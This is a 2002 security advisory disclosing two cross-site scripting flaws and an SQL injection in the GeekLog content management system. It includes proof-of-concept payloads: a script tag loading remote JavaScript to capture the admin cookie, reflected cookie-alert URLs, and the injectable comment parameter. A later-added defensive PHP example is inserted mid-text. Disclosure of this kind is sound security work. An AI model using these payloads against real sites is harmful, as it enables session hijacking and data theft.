From: Ahmet Sabri ALPER (s_alperhotmail.com)
Date: Mon Jun 10 2002 - 06:41:43 CDT


    +/--------\-------- ALPER Research Labs ------/--------/+
    +/---------\------- Security Advisory -----/---------/+
    +/----------\------ ID: ARL02-A13 ----/----------/+
    +/-----------\----- salperolympos.org ---/-----------/+


    Advisory Information
    --------------------
    Name : Multiple Security Issues in GeekLog
    Software Package : GeekLog
    Vendor Homepage : http://geeklog.sourceforge.net/
    Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
    Platforms : OS Independent, PHP
    Vulnerability Type : Input Validation Error
    Vendor Contacted : 31/05/2002
    Vendor Replied : 01/06/2002
    Prior Problems : N/A
    Current Version : v1.3.5rc1 (vulnerable)


    Summary
    -------
    GeekLog is a web content management system suitable for
    running full-featured community sites. It supports article
    posting, threaded comments, event scheduling, and link
    management and is built around a design philosophy that
    emphasizes ease of use.

    I have found these issues while testing the GeekLog system
    which was to be used at http://www.olympos.org, "Olympos
    Turkish Security Portal".
    Two different types of Cross Site Scripting issues and
    one SQL Injection vulnerability were found in GeekLog.


    Details
    -------
    1. When any user submits a new Calendar Event, the form is sent
    to the site admin for approval. The $url variable, which holds the
    data given in the "Link" section of the form, is not filtered for
    malicious code, so a malicious user may obtain the cookie of the site
    administrator and therefore "own" the site.
    This issue may also be exploited to run malicious code on the GeekLog
    site.
    Proof-of-concept Link input ($url):
    <script src="http://forum.olympos.org/f.js">Alper</script>

    2. Maliciously crafted links from third party sites may allow Cross
    Site Scripting attacks via "index.php" and/or "comment.php".
    Two examples of this:
    /index.php?topic=<script>alert(document.cookie)</script>
    /comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article

    3. The $pid variable is passed directly into an SQL query. This makes it
    possible for attackers to launch SQL injection attacks.
    /comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs

    Because PHP's "Magic Quotes" feature escapes quote characters, this
    third issue might only cause "light" headaches; but if "Magic Quotes"
    is not active, the attacker may be able to retrieve all the information
    about users from the SQL tables.
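    As an added example (not from this advisory and not GeekLog's own code), the PHP below shows how the three inputs named above would be handled defensively: the "Link" URL is validated, reflected values are escaped at output time, and $pid is type-checked and bound as a query parameter. The PDO connection $db and the "comments" table with its "pid" and "title" columns are assumptions.

```php
<?php
// Added illustration, not GeekLog's code. Defensive handling of the inputs
// the advisory names: $url (issue 1), $topic/$title (issue 2), $pid (issue 3).
// Assumes a PDO connection $db and a hypothetical "comments" table.

// Issue 1: the "Link" field must be a plain http(s) URL. Anything else,
// including a <script> tag, is rejected before it is stored for approval.
function validate_event_url(string $url): ?string
{
    $url = trim($url);
    if (strlen($url) > 255 || filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// Issues 1 and 2: every value reflected into a page ($url on the admin
// approval page, $topic and $title on index.php/comment.php) is escaped at
// output time, so "<script>" reaches the browser as inert text.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Issue 3: $pid is an integer id, so reject anything that is not a run of
// digits and bind it as a typed parameter instead of interpolating it.
function parse_pid(string $raw): ?int
{
    return ctype_digit($raw) ? (int) $raw : null;
}

function load_comment(PDO $db, string $raw_pid): ?array
{
    $pid = parse_pid($raw_pid);
    if ($pid === null) {
        return null; // "pid=PROBLEM_HERE" never reaches the query
    }
    $stmt = $db->prepare('SELECT pid, title FROM comments WHERE pid = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs mirroring the advisory's examples.
var_dump(validate_event_url('<script src="http://example.invalid/f.js">x</script>'));
var_dump(validate_event_url('http://example.invalid/event'));
var_dump(parse_pid('18'), parse_pid("18' OR '1'='1"));
echo html_escape('<script>alert(document.cookie)</script>'), "\n";
```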


    Solution
    --------
    The vendor replied and acted quickly.
    A patch or a new version addressing this issue will
    soon be available via CVS or an FTP download from:
    http://www.sourceforge.net/projects/geeklog
    or
    http://geeklog.sourceforge.net

    The GeekLog development team said that they will also be
    cleaning the code of other security issues similar to
    those mentioned above.


    Credits
    -------
    Discovered on 31, May, 2002 by
    Ahmet Sabri ALPER <salperolympos.org>
    ALPER Research Labs.

    The ALPER Research Labs. [ARL] workers are freelance
    security professionals and WhiteHat hackers. The ARL
    workers are available for hire for legal jobs.
    The ARL also supports the Open Software Community by detecting
    possible security issues in GPL or any other publicly licensed
    product.


    References
    ----------
    Product Web Page: http://geeklog.sourceforge.net/
    Olympos: http://www.olympos.org/